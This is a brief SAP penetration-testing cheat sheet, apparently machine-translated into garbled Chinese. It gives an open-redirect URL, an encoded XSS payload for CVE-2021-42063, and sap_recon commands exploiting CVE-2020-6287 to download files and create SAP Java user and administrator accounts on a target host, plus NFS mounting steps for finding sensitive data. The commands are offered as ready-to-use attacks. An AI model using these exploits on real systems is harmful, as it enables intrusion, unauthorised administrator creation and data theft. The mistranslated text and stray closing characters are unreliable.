SAP Pentest Cheatsheet

Bismillah

為了進行五旬節，您應該在網絡上部署SAP系統

1. 打開重定向檢查

https：// host/sap/public/bc/icf/logoff？ redirecturl = maliciousurl

2. 無抵押協議（HTTP）檢查

http：//主機：port/startpage

http：//主機：port/sap/public/info

3. 系統信息配置檢查

http：//主機：port/sap/public/info

4. XSS（CVE-2021-42063）

尋找/sapirexthelp https：// localhost/sapirexthelp

https：// host/host/sapirexthelp/Random/％22％3E％3C％53％56％47％20％4F％4E％4E％4C％4F％41％44％3D％26％26％23％39％37％37％26％26％23％31 ％30％38％26％23％31％31％31％26％23％31％31％31％26％26％31％31％31％36％28％26％26％23％36％36％34％26％26％23％78％66％66％26％26％23％23％78％36 ％33％26％23％78％37％37％35％26％23％78％36％64％26％23％78％36％35％26％26％23％78％65％65％26％26％23％78％37％34％34％26％23％23％78％78％32％65％65％26 ％23％78％36％34％26％23％78％36％66％26％23％78％36％64％26％26％23％78％36％31％26％26％23％78％36％39％26％26％23％23％78％36％65％65％29％3E.asp

5. SAP信息系統1.0外殼上傳

6. CVE-2022-22536（ICMAD SAP）

7. SAP偵察漏洞（CVE-2020-6287，CVE-2020-6286）

https://github.com/chipik/sap_recon

下載zip文件

python recon.py -H 172.16.30.8 -f /1111.zip

創建SAP Java用戶

Python recon.py -H 172.16.30.8 -U

創建SAP Java管理員用戶

python recon.py -H 172.16.30.8 -a -a

1. SSL漏洞檢查

SSLSCAN

2. NFS安裝

nfs-ls nfs：// host/mount

mkdir mnt && mount -t nfs主機：/mount ./mnt

祝您搜索敏感信息的好運

我正在尋找SAP虛擬機或容器進行五型模擬，如果您有信息，請訪問我@linkedin）

分享很關心

ك證ص。